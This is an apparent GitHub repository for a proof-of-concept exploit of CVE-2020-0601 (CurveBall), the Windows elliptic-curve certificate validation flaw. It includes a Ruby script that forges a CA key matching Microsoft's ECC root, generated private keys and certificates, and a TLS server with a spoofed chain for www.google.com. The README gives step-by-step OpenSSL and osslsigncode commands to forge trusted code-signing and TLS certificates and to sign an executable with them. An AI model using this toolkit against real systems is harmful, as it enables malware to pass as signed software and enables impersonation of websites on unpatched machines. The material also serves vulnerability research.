├── code_signing ├── rogue.srl ├── cert.p12 ├── 7z1900-x64.exe ├── 7z1900-x64_signed.exe ├── cert.key ├── cert.csr ├── rogue.key ├── cert.crt └── rogue.crt ├── tls ├── cert.key ├── package.json ├── index.js ├── ca.crt ├── cert.crt └── spoofed_ca.crt ├── openssl_cs.conf ├── openssl_tls.conf ├── main.rb ├── MicrosoftECCProductRootCertificateAuthority.cer └── README.md /code_signing/rogue.srl: -------------------------------------------------------------------------------- 1 | 4ECC0F65072F6771824DBB7C943B304BFF0679AE 2 | -------------------------------------------------------------------------------- /code_signing/cert.p12: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Quillor243/CurveBall/HEAD/code_signing/cert.p12 -------------------------------------------------------------------------------- /code_signing/7z1900-x64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Quillor243/CurveBall/HEAD/code_signing/7z1900-x64.exe -------------------------------------------------------------------------------- /code_signing/7z1900-x64_signed.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Quillor243/CurveBall/HEAD/code_signing/7z1900-x64_signed.exe -------------------------------------------------------------------------------- /tls/cert.key: -------------------------------------------------------------------------------- 1 | -----BEGIN EC PRIVATE KEY----- 2 | MIGkAgEBBDCgd9P2yIE1qGFyV4fCF2+sh2ec4hpkhQ3kZJyaEFmagpwa2Pw7Q4yg 3 | kpOYTXxKwFGgBwYFK4EEACKhZANiAARz3A1gwlzjZSgCLFnMUv7KPoXR9EfjKFqH 4 | CYnqzRZLfGHd5Dtc9wSDUwtt1U8Tx2kfdabB+h9NREJAByaAZQ/rKzVy6Iup5i1w 5 | 7maxTwsRo83eScJYiQM7PfFBAnIMzLk= 6 | -----END EC PRIVATE KEY----- 7 | -------------------------------------------------------------------------------- /code_signing/cert.key: 
-------------------------------------------------------------------------------- 1 | -----BEGIN EC PRIVATE KEY----- 2 | MIGkAgEBBDDSuSBvfWsoE7DAGzfwR9wgHiKN9KWecUdFe9QcPKJioPL6AiovxzO8 3 | ubQs+zds3pOgBwYFK4EEACKhZANiAARIi/X238exBb/lqDiGEzvGiwhWp7ndjxbC 4 | k4vwn9AXUFFQUO6WoLiovkVT8gZA7U5aq3OjvmkBcchRN+hREfT7D0GvX51i5i+Q 5 | ms7sK0pZmX0aamk3wkUAFMBJ+WplMPg= 6 | -----END EC PRIVATE KEY----- 7 | -------------------------------------------------------------------------------- /tls/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "tlsserver", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "index.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1" 8 | }, 9 | "author": "", 10 | "license": "ISC", 11 | "dependencies": { 12 | "express": "^4.17.1" 13 | } 14 | } 15 | -------------------------------------------------------------------------------- /openssl_cs.conf: -------------------------------------------------------------------------------- 1 | [ req ] 2 | prompt = no 3 | distinguished_name = dn 4 | 5 | [ dn ] 6 | C = DK 7 | ST = Denmark 8 | L = Copenhagen 9 | O = ollypwn 10 | CN = ollypwn 11 | 12 | [ v3_cs ] 13 | basicConstraints = critical, CA:FALSE 14 | subjectKeyIdentifier = hash 15 | keyUsage = digitalSignature 16 | extendedKeyUsage = codeSigning -------------------------------------------------------------------------------- /openssl_tls.conf: -------------------------------------------------------------------------------- 1 | [ req ] 2 | prompt = no 3 | distinguished_name = dn 4 | 5 | [ dn ] 6 | C = DK 7 | ST = Denmark 8 | L = Copenhagen 9 | O = ollypwn 10 | CN = www.google.com 11 | 12 | [ v3_tls ] 13 | basicConstraints = critical, CA:FALSE 14 | subjectKeyIdentifier = hash 15 | keyUsage = digitalSignature, keyEncipherment 16 | extendedKeyUsage = serverAuth, clientAuth -------------------------------------------------------------------------------- /tls/index.js: 
-------------------------------------------------------------------------------- 1 | const app = require('express')(); 2 | const https = require('https'); 3 | const fs = require('fs'); 4 | 5 | //GET home route 6 | app.get('/', (req, res) => { 7 | res.send('
Hello World
'); 8 | }); 9 | 10 | https.createServer({ 11 | key: fs.readFileSync('./cert.key'), 12 | cert: fs.readFileSync('./cert.crt'), 13 | ca: [ 14 | fs.readFileSync('./spoofed_ca.crt') 15 | ] 16 | }, app) 17 | .listen(8080); -------------------------------------------------------------------------------- /main.rb: -------------------------------------------------------------------------------- 1 | require 'openssl' 2 | 3 | raw = File.read ARGV[0] 4 | ca = OpenSSL::X509::Certificate.new(raw) # Read certificate 5 | ca_key = ca.public_key # Parse public key from CA 6 | 7 | ca_key.private_key = 1 # Set a private key, which will match Q = d'G' 8 | group = ca_key.group 9 | group.set_generator(ca_key.public_key, group.order, group.cofactor) 10 | group.asn1_flag = OpenSSL::PKey::EC::EXPLICIT_CURVE 11 | ca_key.group = group # Set new group with fake generator G' = Q 12 | 13 | File.open("spoofed_ca.key", 'w') { |f| f.write ca_key.to_pem } -------------------------------------------------------------------------------- /code_signing/cert.csr: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE REQUEST----- 2 | MIIBsTCCATcCAQAwWDELMAkGA1UEBhMCREsxEDAOBgNVBAgMB0Rlbm1hcmsxEzAR 3 | BgNVBAcMCkNvcGVuaGFnZW4xEDAOBgNVBAoMB29sbHlwd24xEDAOBgNVBAMMB29s 4 | bHlwd24wdjAQBgcqhkjOPQIBBgUrgQQAIgNiAARIi/X238exBb/lqDiGEzvGiwhW 5 | p7ndjxbCk4vwn9AXUFFQUO6WoLiovkVT8gZA7U5aq3OjvmkBcchRN+hREfT7D0Gv 6 | X51i5i+Qms7sK0pZmX0aamk3wkUAFMBJ+WplMPigYDBeBgkqhkiG9w0BCQ4xUTBP 7 | MAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFD3VN00KbLZn3BAYmWLO1fpQBoidMAsG 8 | A1UdDwQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDAzAKBggqhkjOPQQDAgNoADBl 9 | AjB139MYuecW6hMvEC/NlH0QkPpCLpjXoTnWXOgAVAUnL8dI3TJIIZZuvGh0/bzU 10 | 0wgCMQCP+xKNsO3MYmJz17MmMZgoWkXvvdWwxXnP9wZ6FcunoBUbtQL42ULWs3BR 11 | 2+RtaBo= 12 | -----END CERTIFICATE REQUEST----- 13 | -------------------------------------------------------------------------------- /code_signing/rogue.key: 
-------------------------------------------------------------------------------- 1 | -----BEGIN EC PRIVATE KEY----- 2 | MIIB+gIBAQQwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 3 | AAAAAAAAAAABoIIBWzCCAVcCAQEwPAYHKoZIzj0BAQIxAP////////////////// 4 | ///////////////////////+/////wAAAAAAAAAA/////zB7BDD///////////// 5 | /////////////////////////////v////8AAAAAAAAAAP////wEMLMxL6fiPufk 6 | mI4Fa+P4LRkYHZxu/oFBEgMUCI9QE4daxlY5jYou0Z0qhcjt0+wq7wMVAKM1kmqj 7 | GaJ6HQCJamdzpIJ6zaxzBGEExxEWKnYdVo6+uWJl1MPOtPDDMOyPbdduObzISaur 8 | uONDeNWBBl3vx32fztazkHXeDLCQ3iO6yNE+Z+AZqRuGMR5fNC3uF/0V+34nijKh 9 | 6smPyX4Yyy87LEh6fab0AQesAjEA////////////////////////////////x2NN 10 | gfQ3Ld9YGg2ySLCneuzsGWrMxSlzAgEBoWQDYgAExxEWKnYdVo6+uWJl1MPOtPDD 11 | MOyPbdduObzISauruONDeNWBBl3vx32fztazkHXeDLCQ3iO6yNE+Z+AZqRuGMR5f 12 | NC3uF/0V+34nijKh6smPyX4Yyy87LEh6fab0AQes 13 | -----END EC PRIVATE KEY----- 14 | -------------------------------------------------------------------------------- /tls/ca.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICIDCCAaagAwIBAgIUAa53SYGVPJmIsm0UB41pKMvH71IwCgYIKoZIzj0EAwIw 3 | RzELMAkGA1UEBhMCREsxEDAOBgNVBAgMB0Rlbm1hcmsxEzARBgNVBAcMCkNvcGVu 4 | aGFnZW4xETAPBgNVBAoMCEBvbGx5cHduMB4XDTIwMDExNjE1MzYyM1oXDTIwMDIx 5 | NTE1MzYyM1owRzELMAkGA1UEBhMCREsxEDAOBgNVBAgMB0Rlbm1hcmsxEzARBgNV 6 | BAcMCkNvcGVuaGFnZW4xETAPBgNVBAoMCEBvbGx5cHduMHYwEAYHKoZIzj0CAQYF 7 | K4EEACIDYgAEcSXlrfsOkX1M2VhmAqUpStKw4onqbgtvCvSTfRf0lJ8IQqYlTjVH 8 | CI5KpD/It9N+SxrPl4+sEweWslsORgEpFsxXyleShS6x9ZY4U7Cujp8g+TDgbtVM 9 | X2paVu11tq2po1MwUTAdBgNVHQ4EFgQUID+a1V804ozxVKHX8vtebC37fc0wHwYD 10 | VR0jBBgwFoAUID+a1V804ozxVKHX8vtebC37fc0wDwYDVR0TAQH/BAUwAwEB/zAK 11 | BggqhkjOPQQDAgNoADBlAjEA2LtHHRykAEUjxUDhKwy/nUmp8W5XJMQ+nl9NBE3X 12 | oN6p7SOo2uIsHS/6Nps0KL7lAjA29AC/iYd+Dy2wpXdwoQ5LX8C4mm6qRP0oPYjb 13 | Fc0rALwCh5wxy3c1cC12l3GemIo= 14 | -----END CERTIFICATE----- 15 | 
-------------------------------------------------------------------------------- /code_signing/cert.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICLjCCAbSgAwIBAgIUTswPZQcvZ3GCTbt8lDswS/8Gea4wCgYIKoZIzj0EAwIw 3 | RjELMAkGA1UEBhMCREsxEDAOBgNVBAgMB0Rlbm1hcmsxEzARBgNVBAcMCkNvcGVu 4 | aGFnZW4xEDAOBgNVBAoMB09MTFlQV04wHhcNMjAwMTE2MTMzNDMxWhcNNDcwNjAz 5 | MTMzNDMxWjBYMQswCQYDVQQGEwJESzEQMA4GA1UECAwHRGVubWFyazETMBEGA1UE 6 | BwwKQ29wZW5oYWdlbjEQMA4GA1UECgwHb2xseXB3bjEQMA4GA1UEAwwHb2xseXB3 7 | bjB2MBAGByqGSM49AgEGBSuBBAAiA2IABEiL9fbfx7EFv+WoOIYTO8aLCFanud2P 8 | FsKTi/Cf0BdQUVBQ7paguKi+RVPyBkDtTlqrc6O+aQFxyFE36FER9PsPQa9fnWLm 9 | L5CazuwrSlmZfRpqaTfCRQAUwEn5amUw+KNRME8wDAYDVR0TAQH/BAIwADAdBgNV 10 | HQ4EFgQUPdU3TQpstmfcEBiZYs7V+lAGiJ0wCwYDVR0PBAQDAgeAMBMGA1UdJQQM 11 | MAoGCCsGAQUFBwMDMAoGCCqGSM49BAMCA2gAMGUCMQDH9ZlXKwILXNrQ55ddK6sb 12 | 8TrWOwQT32VNyBoTHBBaiBhGefbg7D5D9IEwKy+6BpkCMB5zln4X5Rb8tYTNFWZD 13 | GsxocqoQAX4vDbkZKXfNE/9P/YouF/CYZxzIq878eO4wQA== 14 | -----END CERTIFICATE----- 15 | -------------------------------------------------------------------------------- /tls/cert.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICPzCCAcWgAwIBAgIUVRcUbH7UP5+4QM8NioaLvcMMH8AwCgYIKoZIzj0EAwIw 3 | RjELMAkGA1UEBhMCREsxEDAOBgNVBAgMB0Rlbm1hcmsxEzARBgNVBAcMCkNvcGVu 4 | aGFnZW4xEDAOBgNVBAoMB29sbHlwd24wHhcNMjAwMTE2MTU0NjAwWhcNNDcwNjAz 5 | MTU0NjAwWjBfMQswCQYDVQQGEwJESzEQMA4GA1UECAwHRGVubWFyazETMBEGA1UE 6 | BwwKQ29wZW5oYWdlbjEQMA4GA1UECgwHb2xseXB3bjEXMBUGA1UEAwwOd3d3Lmdv 7 | b2dsZS5jb20wdjAQBgcqhkjOPQIBBgUrgQQAIgNiAARz3A1gwlzjZSgCLFnMUv7K 8 | PoXR9EfjKFqHCYnqzRZLfGHd5Dtc9wSDUwtt1U8Tx2kfdabB+h9NREJAByaAZQ/r 9 | KzVy6Iup5i1w7maxTwsRo83eScJYiQM7PfFBAnIMzLmjWzBZMAwGA1UdEwEB/wQC 10 | MAAwHQYDVR0OBBYEFH/VYukGT+BkV0OIPio8/ns69feAMAsGA1UdDwQEAwIFoDAd 11 | BgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwCgYIKoZIzj0EAwIDaAAwZQIx 12 | 
APEbRxUst4bOQWemrmmmMNkRTeQjc5Mstu3o+qCAPlrsVSX2O1VELqdio8O1FDHr 13 | MwIwBRh6yfwRhRnb71EJx67An0mTzj59YbvWjsM0uW73kxQc+Y2rPPAW+chXjb/K 14 | pZtM 15 | -----END CERTIFICATE----- 16 | -------------------------------------------------------------------------------- /MicrosoftECCProductRootCertificateAuthority.cer: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDIzCCAqigAwIBAgIQFJgmZtx8zY9AU2d7uZnshTAKBggqhkjOPQQDAzCBlDEL 3 | MAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1v 4 | bmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjE+MDwGA1UEAxM1TWlj 5 | cm9zb2Z0IEVDQyBQcm9kdWN0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIw 6 | MTgwHhcNMTgwMjI3MjA0MjA4WhcNNDMwMjI3MjA1MDQ2WjCBlDELMAkGA1UEBhMC 7 | VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV 8 | BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjE+MDwGA1UEAxM1TWljcm9zb2Z0IEVD 9 | QyBQcm9kdWN0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIwMTgwdjAQBgcq 10 | hkjOPQIBBgUrgQQAIgNiAATHERYqdh1Wjr65YmXUw8608MMw7I9t1245vMhJq6u4 11 | 40N41YEGXe/HfZ/O1rOQdd4MsJDeI7rI0T5n4BmpG4YxHl80Le4X/RX7fieKMqHq 12 | yY/JfhjLLzssSHp9pvQBB6yjgbwwgbkwDgYDVR0PAQH/BAQDAgGGMA8GA1UdEwEB 13 | /wQFMAMBAf8wHQYDVR0OBBYEFEPvcIe4nb/siBncxsRrdQ11NDMIMBAGCSsGAQQB 14 | gjcVAQQDAgEAMGUGA1UdIAReMFwwBgYEVR0gADBSBgwrBgEEAYI3TIN9AQEwQjBA 15 | BggrBgEFBQcCARY0aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2Nz 16 | L1JlcG9zaXRvcnkuaHRtADAKBggqhkjOPQQDAwNpADBmAjEAocBJRF0yVSfMPpBu 17 | JSKdJFubUTXHkUlJKqP5b08czd2c4bVXyZ7CIkWbBhVwHEW/AjEAxdMo63LHPrCs 18 | Jwl/Yj1geeWS8UUquaUC5GC7/nornGCntZkU8rC+8LsFllZWj8Fo 19 | -----END CERTIFICATE----- 20 | -------------------------------------------------------------------------------- /tls/spoofed_ca.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDdTCCAvygAwIBAgIUBXWtY5Dvu9hUH0cFzUx/UxCp4X0wCgYIKoZIzj0EAwIw 3 | RjELMAkGA1UEBhMCREsxEDAOBgNVBAgMB0Rlbm1hcmsxEzARBgNVBAcMCkNvcGVu 4 | 
aGFnZW4xEDAOBgNVBAoMB29sbHlwd24wHhcNMjAwMTE2MTU0MDQyWhcNMjAwMjE1 5 | MTU0MDQyWjBGMQswCQYDVQQGEwJESzEQMA4GA1UECAwHRGVubWFyazETMBEGA1UE 6 | BwwKQ29wZW5oYWdlbjEQMA4GA1UECgwHb2xseXB3bjCCAcwwggFkBgcqhkjOPQIB 7 | MIIBVwIBATA8BgcqhkjOPQEBAjEA//////////////////////////////////// 8 | //////7/////AAAAAAAAAAD/////MHsEMP////////////////////////////// 9 | ///////////+/////wAAAAAAAAAA/////AQwszEvp+I+5+SYjgVr4/gtGRgdnG7+ 10 | gUESAxQIj1ATh1rGVjmNii7RnSqFyO3T7CrvAxUAozWSaqMZonodAIlqZ3OkgnrN 11 | rHMEYQTHERYqdh1Wjr65YmXUw8608MMw7I9t1245vMhJq6u440N41YEGXe/HfZ/O 12 | 1rOQdd4MsJDeI7rI0T5n4BmpG4YxHl80Le4X/RX7fieKMqHqyY/JfhjLLzssSHp9 13 | pvQBB6wCMQD////////////////////////////////HY02B9Dct31gaDbJIsKd6 14 | 7OwZaszFKXMCAQEDYgAExxEWKnYdVo6+uWJl1MPOtPDDMOyPbdduObzISauruOND 15 | eNWBBl3vx32fztazkHXeDLCQ3iO6yNE+Z+AZqRuGMR5fNC3uF/0V+34nijKh6smP 16 | yX4Yyy87LEh6fab0AQeso1MwUTAdBgNVHQ4EFgQUQ+9wh7idv+yIGdzGxGt1DXU0 17 | MwgwHwYDVR0jBBgwFoAUQ+9wh7idv+yIGdzGxGt1DXU0MwgwDwYDVR0TAQH/BAUw 18 | AwEB/zAKBggqhkjOPQQDAgNnADBkAjBlVWKmhCLbxs2OCgIlHkudZ09s1v2F1tsV 19 | PddB+Aaw+l/nwmGxi/QHtocsjLSy1gACMCnXgQ69XzMc1LTp/WuZBFkvxRc3qe3Q 20 | ZL7MX5o0vVldH0ic2HjAc15hgiLz6zbuEw== 21 | -----END CERTIFICATE----- 22 | -------------------------------------------------------------------------------- /code_signing/rogue.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDdzCCAvygAwIBAgIUbZPNgW325oB9l/76AqUG6GJDaB8wCgYIKoZIzj0EAwIw 3 | RjELMAkGA1UEBhMCREsxEDAOBgNVBAgMB0Rlbm1hcmsxEzARBgNVBAcMCkNvcGVu 4 | aGFnZW4xEDAOBgNVBAoMB09MTFlQV04wHhcNMjAwMTE2MTMzNDExWhcNMjAwMjE1 5 | MTMzNDExWjBGMQswCQYDVQQGEwJESzEQMA4GA1UECAwHRGVubWFyazETMBEGA1UE 6 | BwwKQ29wZW5oYWdlbjEQMA4GA1UECgwHT0xMWVBXTjCCAcwwggFkBgcqhkjOPQIB 7 | MIIBVwIBATA8BgcqhkjOPQEBAjEA//////////////////////////////////// 8 | //////7/////AAAAAAAAAAD/////MHsEMP////////////////////////////// 9 | ///////////+/////wAAAAAAAAAA/////AQwszEvp+I+5+SYjgVr4/gtGRgdnG7+ 10 | 
gUESAxQIj1ATh1rGVjmNii7RnSqFyO3T7CrvAxUAozWSaqMZonodAIlqZ3OkgnrN 11 | rHMEYQTHERYqdh1Wjr65YmXUw8608MMw7I9t1245vMhJq6u440N41YEGXe/HfZ/O 12 | 1rOQdd4MsJDeI7rI0T5n4BmpG4YxHl80Le4X/RX7fieKMqHqyY/JfhjLLzssSHp9 13 | pvQBB6wCMQD////////////////////////////////HY02B9Dct31gaDbJIsKd6 14 | 7OwZaszFKXMCAQEDYgAExxEWKnYdVo6+uWJl1MPOtPDDMOyPbdduObzISauruOND 15 | eNWBBl3vx32fztazkHXeDLCQ3iO6yNE+Z+AZqRuGMR5fNC3uF/0V+34nijKh6smP 16 | yX4Yyy87LEh6fab0AQeso1MwUTAdBgNVHQ4EFgQUQ+9wh7idv+yIGdzGxGt1DXU0 17 | MwgwHwYDVR0jBBgwFoAUQ+9wh7idv+yIGdzGxGt1DXU0MwgwDwYDVR0TAQH/BAUw 18 | AwEB/zAKBggqhkjOPQQDAgNpADBmAjEA88Jz9VIOOprtVppEgIM32y3DmQf1T+B/ 19 | 2aFpcuPC/A1Q6ELhx1U6ouc/63aXaxr4AjEA0II/b9XFXJZabdFzR1iKHvzUe4HA 20 | B9Mi33aEPCq4fH3zjN37qiIvPv4s8rNMKY+n 21 | -----END CERTIFICATE----- 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CurveBall (CVE-2020-0601) - PoC 2 | CVE-2020-0601, commonly referred to as CurveBall, is a vulnerability in which the signature of certificates using elliptic curve cryptography (ECC) is not correctly verified. 3 | 4 | ECC relies on different parameters. These parameters are standardized for many curves. However, Microsoft didn't check all these parameters. The parameter `G` (the generator) was not checked, and an attacker can therefore supply their own generator, such that when Microsoft tries to validate the certificate against a trusted CA, it'll only look for matching public keys, and then use the generator of the certificate. The NSA explains the impact of this vulnerability and more [here](https://media.defense.gov/2020/Jan/14/2002234275/-1/-1/0/CSA-WINDOWS-10-CRYPT-LIB-20190114.PDF). 5 | 6 | `MicrosoftECCProductRootCertificateAuthority.cer` is by default a trusted root certificate authority (CA) using ECC on Windows 10. Anything signed with this certificate will therefore automatically be trusted. 
7 | 8 | **Minimum requirements** 9 | `openssl 1.1.0` 10 | `ruby 2.4.0` 11 | 12 | ## Mathematical details 13 | If you're interested in the mathematical details of the vulnerability, please read more [here](https://news.ycombinator.com/item?id=22048619). 14 | 15 | In order to spoof the certificate, we set the following parameters: 16 | 17 | d' = 1 18 | G' = Q 19 | Such that `Q = Q' = d'G'`. 20 | 21 | ## Usage 22 | Create a certificate with the same public key and parameters as a trusted CA. This will be used as our spoofing CA. Set the generator to a value for which you know the private key. You can easily set the generator to the public key, and have a private key set to `1`, since `Q = dG`. 23 | 24 | Next up, you create a certificate signing request with the extensions you wish to use, e.g. code signing or server authentication. 25 | 26 | Sign this certificate request with your spoofed CA and CA key, and add the usage extensions. 27 | 28 | Bundle the signed certificate request (now a regular certificate) with the spoofed CA, and you have a signed and trusted certificate. 29 | 30 | When Windows checks whether the certificate is trusted, it'll see that it has been signed by our spoofed CA. It then looks at the spoofed CA's public key to check against trusted CAs. Then it simply verifies the signature of our spoofed CA with the spoofed CA's generator - this is the issue. Systems with Microsoft's January 2020 security updates installed no longer accept such a chain, and they record the attempt as an Audit-CVE event (Event ID 1) in the Windows Application event log. 31 | 32 | If you choose to open your newly signed, trusted certificate in Windows, it'll not recognize it as trusted, since it hasn't been tied to anything, thus it will not use the spoofed CA. The certificate must always present itself with the spoofed CA. 33 | 34 | ## Code Signing 35 | *Please use this for educational and research purposes only.* 36 | 37 | Extract the public key from the CA and modify it according to the vulnerability: 38 | 39 | ruby main.rb ./MicrosoftECCProductRootCertificateAuthority.cer 40 | Generate a new x509 certificate based on this key. This will be our own spoofed CA. 
41 | 42 | openssl req -new -x509 -key spoofed_ca.key -out spoofed_ca.crt 43 | Generate a new key. This key can be of any type you want. It will be used to create a code signing certificate, which we will sign with our own CA. 44 | 45 | openssl ecparam -name secp384r1 -genkey -noout -out cert.key 46 | Next up, create a new certificate signing request (CSR). This request would normally be sent to a trusted CA, but since we have a spoofed one, we can sign it ourselves. 47 | 48 | openssl req -new -key cert.key -out cert.csr -config openssl_cs.conf -reqexts v3_cs 49 | Sign your new CSR with our spoofed CA and CA key. This certificate will expire in 2047, whereas the real trusted Microsoft CA will expire in 2043. 50 | 51 | openssl x509 -req -in cert.csr -CA spoofed_ca.crt -CAkey spoofed_ca.key -CAcreateserial -out cert.crt -days 10000 -extfile openssl_cs.conf -extensions v3_cs 52 | The only thing left is to pack the certificate, its key and the spoofed CA into a PKCS12 file for signing executables. 53 | 54 | openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed_ca.crt -name "Code Signing" -out cert.p12 55 | Sign your executable with the PKCS12 file. 56 | 57 | osslsigncode sign -pkcs12 cert.p12 -n "Signed by ollypwn" -in 7z1900-x64.exe -out 7z1900-x64_signed.exe 58 | 59 | ## SSL/TLS 60 | *Please use this for educational and research purposes only.* 61 | Extract the public key from the CA and modify it according to the vulnerability: 62 | 63 | ruby main.rb ./MicrosoftECCProductRootCertificateAuthority.cer 64 | Generate a new x509 certificate based on this key. This will be our own spoofed CA. 65 | 66 | openssl req -new -x509 -key spoofed_ca.key -out spoofed_ca.crt 67 | Generate a new key. This key can be of any type you want. It will be used to create an SSL certificate, which we will sign with our own CA. 68 | 69 | openssl ecparam -name secp384r1 -genkey -noout -out cert.key 70 | Next up, create a new certificate signing request (CSR). 
This request would normally be sent to a trusted CA, but since we have a spoofed one, we can sign it ourselves. 71 | 72 | If you wish to change the domain name, edit `CN = www.google.com` to `CN = www.example.com` inside of `openssl_tls.conf`. 73 | 74 | openssl req -new -key cert.key -out cert.csr -config openssl_tls.conf -reqexts v3_tls 75 | Sign your new CSR with our spoofed CA and CA key. This certificate will expire in 2047, whereas the real trusted Microsoft CA will expire in 2043. 76 | 77 | openssl x509 -req -in cert.csr -CA spoofed_ca.crt -CAkey spoofed_ca.key -CAcreateserial -out cert.crt -days 10000 -extfile openssl_tls.conf -extensions v3_tls 78 | You can now use `cert.crt`, `cert.key`, and `spoofed_ca.crt` to serve your content. Again, remember to add `spoofed_ca.crt` as a certificate chain in your server's HTTPS configuration. 79 | 80 | See the usage example in [tls/index.js](https://github.com/ollypwn/CVE-2020-0601/blob/master/tls/index.js). 81 | --------------------------------------------------------------------------------